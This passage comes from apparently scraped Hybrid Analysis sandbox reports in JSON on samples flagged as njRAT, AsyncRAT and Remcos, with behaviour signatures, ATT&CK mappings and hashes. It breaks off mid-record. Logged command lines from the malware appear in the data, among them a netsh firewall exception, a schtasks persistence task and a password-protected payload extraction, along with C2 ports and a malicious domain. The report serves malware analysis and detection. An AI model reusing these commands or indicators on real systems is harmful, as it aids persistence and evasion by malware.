\"Process32FirstW with parameter [System Process]\" (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"Process32NextW with parameter dinotify.exe\" (UID: 00000000-00006124)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-40", "type": 6, "relevance": 10, "name": "Calls an API typically used for keylogging", "description": "\"GameSDK.exe\" called \"GetAsyncKeyState\" (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"GetKeyState\" (UID: 00000000-00003876)", "origin": "API Call", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "target-423", "type": 9, "relevance": 5, "name": "Tries to access/write temporary files", "description": "Process \"%WINDIR%\\system32\\cmd.exe\" with commandline \"/c schtasks.exe /Create /XML \"%TEMP%\\\\SystemCheck.xml\" /TN \"System\\\\SystemCheck\"\" (UID: 00000000-00004380)", "origin": "Monitored Target", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"host.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"host.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"Stable_Network.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\aut3301.tmp\" for deletion\n \"Stable_Network.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\aut8E99.tmp\" for deletion\n \"Stable_Network.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\SystemCheck.xml\" for deletion\n \"Stable_Network.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\32.exe\" for deletion\n \"Stable_Network.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\64.exe\" for deletion\n \"Stable_Network.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\CL_Debug_Log.txt\" for deletion\n \"Stable_Network.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\CR_Debug_Log.txt\" for deletion\n \"Stable_Network.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\asacpiex.dll\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"Stable_Network.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\aut3301.tmp\" with delete access\n \"Stable_Network.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\aut8E99.tmp\" with delete access\n \"Stable_Network.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\SystemCheck.xml\" with delete access\n \"Stable_Network.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\32.exe\" with delete access\n \"Stable_Network.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\64.exe\" with delete access\n \"Stable_Network.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\CL_Debug_Log.txt\" with delete access\n \"Stable_Network.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\CR_Debug_Log.txt\" with delete access\n \"Stable_Network.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\asacpiex.dll\" with delete access\n \"host.exe\" opened \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\security.config.cch.6136.907395056\" with delete access\n \"host.exe\" opened \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\enterprisesec.config.cch.6136.907395056\" with delete access\n \"host.exe\" opened \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\SECURITY.CONFIG.CCH.6136.907395056\" with delete access\n \"host.exe\" opened \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\ENTERPRISESEC.CONFIG.CCH.6136.907395056\" with delete access\n \"host.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\CLR SECURITY CONFIG\\V2.0.50727.312\\SECURITY.CONFIG.CCH.6136.907395446\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "External Systems", "identifier": "suricata-1", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain\" (SID: 2042936, Rev: 3, Severity: 2) categorized as \"Potentially Bad Traffic\"\n Detected alert \"ET DYN_DNS DNS Query to DynDNS Domain *.ddns .net\" (SID: 2028675, Rev: 3, Severity: 2) categorized as \"Potentially Bad Traffic\"", "origin": "Suricata Alerts"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Pattern Matching", "identifier": "yara-0", "type": 13, "relevance": 9, "name": "YARA signature match", "description": "YARA signature \"njrat1\" matched file \"host.exe\" as \"Identify njRat\" (Author: Brian Wallace @botnet_hunter)\n YARA signature \"win_exe_njRAT\" matched file \"host.exe\" (Author: info@fidelissecurity.com)\n YARA signature \"win_njrat_g0\" matched file \"host.exe\" (Author: Various authors / Slavo Greminger, SWITCH-CERT)\n YARA signature \"njrat1\" matched file \"5b4af3576e30808651ae14fbef1ee719.exe\" as \"Identify njRat\" (Author: Brian Wallace @botnet_hunter)\n YARA signature \"win_exe_njRAT\" matched file \"5b4af3576e30808651ae14fbef1ee719.exe\" (Author: info@fidelissecurity.com)\n YARA signature \"win_njrat_g0\" matched file \"5b4af3576e30808651ae14fbef1ee719.exe\" (Author: Various authors / Slavo Greminger, SWITCH-CERT)\n YARA signature \"njrat1\" matched file \"GameSDK.exe\" as \"Identify njRat\" (Author: Brian Wallace @botnet_hunter)\n YARA signature \"win_exe_njRAT\" matched file \"GameSDK.exe\" (Author: info@fidelissecurity.com)\n YARA signature \"win_njrat_g0\" matched file \"GameSDK.exe\" (Author: Various authors / Slavo Greminger, SWITCH-CERT)\n YARA signature \"MALWARE_Win_NjRAT\" matched process \"00000000-00006136\" as \"Detects NjRAT / Bladabindi\" (Author: ditekSHen)\n YARA signature \"MALWARE_Win_NjRAT\" matched file \"host.exe\" as \"Detects NjRAT / Bladabindi\" (Author: ditekSHen)\n YARA signature \"MALWARE_Win_NjRAT\" matched file \"5b4af3576e30808651ae14fbef1ee719.exe\" as \"Detects NjRAT / Bladabindi\" (Author: ditekSHen)\n YARA signature \"MALWARE_Win_NjRAT\" matched file \"GameSDK.exe\" as \"Detects NjRAT / Bladabindi\" (Author: ditekSHen)\n YARA signature \"MALWARE_Win_AsyncRAT\" matched process \"00000000-00006060\" as \"Detects AsyncRAT\" (Author: ditekSHen)\n YARA signature \"MALWARE_Win_AsyncRAT\" matched file \"rundl32.exe\" as \"Detects AsyncRAT\" (Author: ditekSHen)", "origin": "YARA Signature"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (UID: 00000000-00006040)\n Spawned process \"rundl32.exe\" (UID: 00000000-00006060)\n Spawned process \"Stable_Network.exe\" (UID: 00000000-00006124)\n Spawned process \"host.exe\" (UID: 00000000-00006136)\n Spawned process \"dw20.exe\" with commandline \"-x -s 836\" (UID: 00000000-00004064)\n Spawned process \"GameSDK.exe\" (UID: 00000000-00003876)\n Spawned process \"netsh.exe\" with commandline \"netsh firewall add allowedprogram \"%ALLUSERSPROFILE%\\\\GameSDK.exe\" \"GameSDK.exe\" ENABLE\" (UID: 00000000-00003972)\n Spawned process \"CL_Debug_Log.txt\" with commandline \"e -p\"JDQJndnqwdnqw2139dn21n3b312idDQDB\" \"%TEMP%\\\\CR_Debug_Log.txt\" -o\"%TEMP%\\\\\"\" (UID: 00000000-00003864)\n Spawned process \"cmd.exe\" with commandline \"/c schtasks.exe /Create /XML \"%TEMP%\\\\SystemCheck.xml\" /TN \"System\\\\SystemCheck\"\" (UID: 00000000-00004380)\n Spawned process \"schtasks.exe\" with commandline \"/Create /XML \"%TEMP%\\\\SystemCheck.xml\" /TN \"System\\\\SystemCheck\"\" (UID: 00000000-00000468)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "binary-28", "type": 8, "relevance": 10, "name": "Drops executable file with image/text extension", "description": "\"CL_Debug_Log.txt\" has type \"PE32 executable (console) Intel 80386 for MS Windows\" and unusual extension \"txt\"", "origin": "Binary File", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" allocated memory in \"C:\\8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\"\n \"Stable_Network.exe\" allocated memory in \"%APPDATA%\\Stable_Network.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\rundl32.exe\" (Handle: 880)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\rundl32.exe\" (Handle: 880)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\rundl32.exe\" (Handle: 880)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Stable_Network.exe\" (Handle: 836)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Stable_Network.exe\" (Handle: 836)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Stable_Network.exe\" (Handle: 836)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\host.exe\" (Handle: 896)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\host.exe\" (Handle: 896)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\host.exe\" (Handle: 896)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\dw20.exe\" (Handle: 928)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\dw20.exe\" (Handle: 928)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\dw20.exe\" (Handle: 928)\n \"host.exe\" wrote 32 bytes to a remote process \"C:\\ProgramData\\GameSDK.exe\" (Handle: 760)\n \"host.exe\" wrote 52 bytes to a remote process \"C:\\ProgramData\\GameSDK.exe\" (Handle: 760)\n \"host.exe\" wrote 4 bytes to a remote process \"C:\\ProgramData\\GameSDK.exe\" (Handle: 760)\n \"GameSDK.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 412)\n \"GameSDK.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 412)\n \"GameSDK.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 412)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-7", "type": 7, "relevance": 7, "name": "Uses network protocols on unusual ports", "description": "TCP traffic to <IPv4> on port 1177\n TCP traffic to <IPv4> on port 5552", "origin": "Network Traffic", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-88", "type": 7, "relevance": 10, "name": "Application communicates with a malicious domain", "description": "Contacted Domain: \"2no.co\" has been identified as malicious", "origin": "Network Traffic", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-15", "type": 9, "relevance": 8, "name": "Modifies firewall settings", "description": "Process \"netsh.exe\" with commandline \"netsh firewall add allowedprogram \"%ALLUSERSPROFILE%\\\\GameSDK.exe\" \"GameSDK.exe\" ENABLE\" (UID: 00000000-00003972)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (D)", "origin": "External System"}]}
ad9843f01ba7d0ace01ff084a61a81c009caf256a6d09ee05bda4e2dd33b44d9
https://hybrid-analysis.com/sample/ad9843f01ba7d0ace01ff084a61a81c009caf256a6d09ee05bda4e2dd33b44d9
Hybrid Analysis - Remcos
{"size": 118560, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "ad9843f01ba7d0ace01ff084a61a81c009caf256a6d09ee05bda4e2dd33b44d9", "sha256": "ad9843f01ba7d0ace01ff084a61a81c009caf256a6d09ee05bda4e2dd33b44d9", "av_detect": 44, "vx_family": "Win/grayware_confidence_70%", "threat_score": 35, "threat_level": 1, "verdict": "no verdict", "total_signatures": 8, "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 27051)", "99 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 27051)"], "imported_objects": ["25 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "26 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 26706)", "33 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26706)", "62 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26706)", "2 .OBJ Files linked with ALIASOBJ.EXE 11.00 (Internal OLDNAMES.LIB Tool) (build: 41118)", "1 .CPP Files compiled with CL.EXE 15.00 (Visual Studio 2008) (build: 30729)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a medium codebase (99 files)"], "total_file_compositions_imports": 321}, "mitre_attcks": [{"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"ad9843f01ba7d0ace01ff084a61a81c009caf256a6d09ee05bda4e2dd33b44d9\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"ad9843f01ba7d0ace01ff084a61a81c009caf256a6d09ee05bda4e2dd33b44d9\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"ad9843f01ba7d0ace01ff084a61a81c009caf256a6d09ee05bda4e2dd33b44d9\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"ad9843f01ba7d0ace01ff084a61a81c009caf256a6d09ee05bda4e2dd33b44d9\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"ad9843f01ba7d0ace01ff084a61a81c009caf256a6d09ee05bda4e2dd33b44d9\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"ad9843f01ba7d0ace01ff084a61a81c009caf256a6d09ee05bda4e2dd33b44d9\" has section name .text with entropy \"6.43049189021\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "External Systems", "identifier": "avtest-9", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively low confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/grayware_confidence_70% (D)", "origin": "External System"}]}
6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb
https://hybrid-analysis.com/sample/6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb
Hybrid Analysis - Remcos
{"size": 498688, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb", "sha256": "6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb", "av_detect": 88, "vx_family": "Trojan.Remcos", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 2, "total_processes": 1, "total_signatures": 225, "extracted_files": [{"name": "logs.dat", "file_path": "%ALLUSERSPROFILE%\\remcos\\logs.dat", "file_size": 192, "sha256": "d9faae62a8cd3ee282445f9dd36f0fba61ccaa194df11eb4cba373e7f7a22d81", "type_tags": ["data"], "description": "data", "runtime_process": "6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe (PID: 3236)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "json_1_.json", "file_size": 961, "sha256": "a88726c8982c6add674b0638ba805dc2c8c6c09ef2f9a12f1f04fef6e6fe0c78", "type_tags": ["data"], "description": "JSON data", "runtime_process": "6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe (PID: 3236)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 27053)", "100 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 27053)"], "imported_objects": ["27 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "26 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 26706)", "33 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26706)", "62 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26706)", "2 .OBJ Files linked with ALIASOBJ.EXE 11.00 (Internal OLDNAMES.LIB Tool) (build: 41118)", "1 .CPP Files compiled with CL.EXE 15.00 (Visual Studio 2008) (build: 30729)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a medium codebase (100 files)"], "total_file_compositions_imports": 327}, "processes": [{"uid": "00000000-00003236", "name": "6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe", "normalized_path": "C:\\6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe", "sha256": "6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb", "av_label": "Trojan.Remcos", "av_matched": 12, "av_total": 22}], "mitre_attcks": [{"tactic": "Reconnaissance", "technique": "IP Addresses", "attck_id": "T1590.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1590/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Gather Victim Network Information", "attck_id": "T1590", "attck_id_wiki": "https://attack.mitre.org/techniques/T1590"}}, {"tactic": "Resource Development", "technique": "Digital Certificates", "attck_id": "T1588.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Obtain Capabilities", "attck_id": "T1588", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 14}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 2, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, 